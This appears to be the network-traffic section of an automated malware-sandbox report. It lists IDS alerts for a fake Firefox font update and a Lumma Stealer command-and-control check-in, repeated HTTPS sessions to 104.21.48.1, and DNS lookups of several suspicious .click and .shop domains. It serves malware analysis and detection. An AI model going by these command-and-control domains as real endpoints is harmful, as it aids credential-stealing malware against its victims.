                                                                                                                                                                                                                          2025-01-07T13:17:15.813918+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649792104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:19.762590+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649819104.21.48.1443TCP
                                                                                                                                                                                                                          2025-01-07T13:17:20.231843+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649819104.21.48.1443TCP
                                                                                                                                                                                                                          • Total Packets: 126
                                                                                                                                                                                                                          • 443 (HTTPS)
                                                                                                                                                                                                                          • 53 (DNS)
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.181366920 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.181418896 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.181487083 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.184792042 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.184807062 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.830116034 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.830202103 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.832937002 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.832956076 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.833189964 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.883243084 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.937124968 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.979332924 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368103027 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368124962 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368144989 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368158102 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368186951 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368417025 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368448973 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.368499041 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.459152937 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.459172964 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.459361076 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.459393978 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.459440947 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464174032 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464240074 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464248896 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464258909 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464287043 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.464313984 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.465224028 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.465240002 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.465250015 CET49713443192.168.2.6104.102.49.254
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.465255976 CET44349713104.102.49.254192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.507177114 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.507239103 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.507438898 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.507718086 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.507735014 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.008297920 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.008393049 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.009995937 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.010005951 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.010210991 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.011499882 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.011518955 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.011564016 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333563089 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333651066 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333720922 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333936930 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333956003 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333967924 CET49714443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.333978891 CET44349714104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.344880104 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.344933033 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.345041037 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.345390081 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.345407009 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.851396084 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.851469040 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.853534937 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.853544950 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.853761911 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.855492115 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.855515957 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:04.855549097 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.326917887 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.326968908 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327013969 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327042103 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327085972 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327104092 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327119112 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327172041 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327198982 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327222109 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327228069 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327271938 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.327713013 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328088045 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328136921 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.328141928 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331599951 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331669092 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.331675053 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.383233070 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415430069 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415488958 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415522099 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415538073 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415544033 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415594101 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415597916 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415607929 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415642977 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415936947 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415946960 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415958881 CET49716443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.415963888 CET44349716104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613301992 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613343000 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613409042 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613749981 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:05.613766909 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.110625982 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.110724926 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.111840010 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.111850977 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.112086058 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113682985 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113907099 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:06.113943100 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.766974926 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767052889 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767194986 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767278910 CET49722443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.767297029 CET44349722104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982263088 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982306004 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982389927 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982660055 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:10.982671976 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.453330994 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.453443050 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454731941 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454745054 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.454953909 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456156969 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456311941 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456346989 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.456404924 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.499345064 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969741106 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969829082 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.969882011 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.989818096 CET49758443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:11.989845991 CET44349758104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.254936934 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.254966021 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255027056 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255280018 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.255292892 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.720985889 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.721069098 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722349882 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722361088 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.722610950 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.723879099 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724026918 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724062920 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724153042 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:12.724159956 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.334852934 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.334959984 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335015059 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335109949 CET49767443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:13.335125923 CET44349767104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.000931978 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.000962973 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001025915 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001333952 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.001354933 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.473488092 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.473566055 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.474854946 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.474862099 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.475115061 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.476543903 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.476624012 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.476629019 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.828109980 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.828217030 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.828269958 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.828392029 CET49783443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:14.828409910 CET44349783104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.359983921 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.360034943 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.360096931 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.360531092 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.360548019 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.813824892 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.813918114 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.815274000 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.815290928 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.815535069 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.830703020 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.831536055 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.831573009 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.831789017 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.831819057 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832034111 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832082987 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832190990 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832222939 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832345963 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832395077 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832521915 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832546949 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832557917 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832571983 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832765102 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832789898 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.832809925 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.833000898 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.833026886 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.840617895 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.840904951 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.840924025 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.840945005 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.840961933 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.841003895 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:15.847018957 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.276256084 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.276356936 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.276428938 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.276617050 CET49792443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.276628971 CET44349792104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.308964968 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.309035063 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.309151888 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.309510946 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.309531927 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.762501955 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.762589931 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.764595985 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.764605999 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.764854908 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.766273022 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.766294003 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:19.766344070 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.231858969 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.231955051 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.232043982 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.240591049 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.240605116 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.240617990 CET49819443192.168.2.6104.21.48.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:20.240623951 CET44349819104.21.48.1192.168.2.6
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.065871000 CET5245453192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.076066971 CET53524541.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.077301025 CET5055353192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.088212967 CET53505531.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.089335918 CET5252053192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.100774050 CET53525201.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.101883888 CET4944953192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.113485098 CET53494491.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.114723921 CET5605453192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.125125885 CET53560541.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.126174927 CET6415953192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.136997938 CET53641591.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.138060093 CET5461553192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.145508051 CET53546151.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.146375895 CET6478753192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.160202980 CET53647871.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.161242008 CET5934753192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.168483019 CET53593471.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.169461966 CET5978753192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.177026033 CET53597871.1.1.1192.168.2.6
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.472965956 CET5699253192.168.2.61.1.1.1
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET53569921.1.1.1192.168.2.6
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.065871000 CET192.168.2.61.1.1.10xfb0Standard query (0)spottercurvei.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.077301025 CET192.168.2.61.1.1.10xdf85Standard query (0)nearycrepso.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.089335918 CET192.168.2.61.1.1.10x68f1Standard query (0)abruptyopsn.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.101883888 CET192.168.2.61.1.1.10x1cc7Standard query (0)wholersorie.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.114723921 CET192.168.2.61.1.1.10x9388Standard query (0)framekgirus.shopA (IP address)IN (0x0001)false
